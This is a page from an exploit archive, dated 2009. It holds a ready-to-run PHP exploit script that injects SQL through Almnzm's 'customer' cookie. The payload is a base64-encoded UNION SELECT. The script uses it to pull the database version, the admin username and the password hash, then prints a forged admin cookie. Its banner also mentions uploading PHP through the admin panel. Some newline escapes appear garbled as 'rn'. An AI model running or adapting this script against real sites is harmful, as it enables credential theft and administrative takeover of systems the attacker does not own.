[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Almnzm (COOKIE: customer) Remote SQL Injection Vulnerability
# Published : 2009-06-29
# Author : Qabandi
# Previous Title : osTicket 1.6 RC4 Admin Login Blind SQL Injection Vulnerability
# Next Title : PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability
<?
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ__
---Script Almnzm SQL INJECTION __/QQQ/````````````````QQQ___
_/QQQQQ/ QQQQQQ
---"Powered by Almnzm" /QQQQ/`` ```QQQQ
/QQQQ/ QQQQ
---admin cookie create |QQQQ/ By Qabandi QQQQ|
---Add PhP Ext |QQQQ| |QQQQ|
---Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ iqa[a]hotmail.fr /QQQQ|
QQQQ __ /QQQQ/
QQQQ /QQ_QQQQ/
QQQQ QQQQQQQ/
QQQQQ /QQQQQ/_
``QQQQQ_____________/QQQ/QQQQ_
``QQQQQQQQQQQQQQQQQQQ/ `QQQQ
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/
-----------------------------------------------------------------------------
');
die;
}
$host = $argv[1];
$p = "http://".$host.$argv[2];
function QAB_GET($qabandi, $from){
$content = $from;
preg_match_all("/<".$qabandi.">([^<]+)</".$qabandi.">/",
$content,
$out, PREG_PATTERN_ORDER);
return $out[1][0];
}
$packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0rn";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn";
$packet.="Pragma: no-cachern";
$packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";rn";
$packet.="Connection: Closernrn";
$o = @fsockopen($host, 80);
if(!$o){
echo "n[x] No response...n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "n[x] 404 Not Found... Make sure of path. n";
die;
}
echo "nn---Qabandi Is Here-------------------------------------------nn";
$Q_ver = QAB_GET("version", $data);
$Q_usr = QAB_GET("user", $data);
$Q_pwd = QAB_GET("pass", $data);
echo "[q]version:n".$Q_ver."nn";
echo "[q]Admin User:n".$Q_usr."nn";
echo "[q]Admin Hash:n".$Q_pwd."nn";
$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);
echo "n---Admin Cookie:n";
echo "nnjavascript:document.cookie='user=".$qookie."';nn";
echo "nn---Qabandi Was Here------------------------------------------nn";
die;
?>
# www.Syue.com [2009-06-29]